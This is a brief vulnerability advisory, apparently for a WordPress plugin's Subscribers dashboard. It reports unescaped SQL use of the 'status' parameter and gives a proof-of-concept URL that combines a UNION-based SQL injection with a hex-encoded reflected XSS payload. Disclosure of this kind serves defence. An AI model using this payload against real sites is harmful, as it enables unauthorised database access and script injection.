The plugin does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=%22+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e+--+g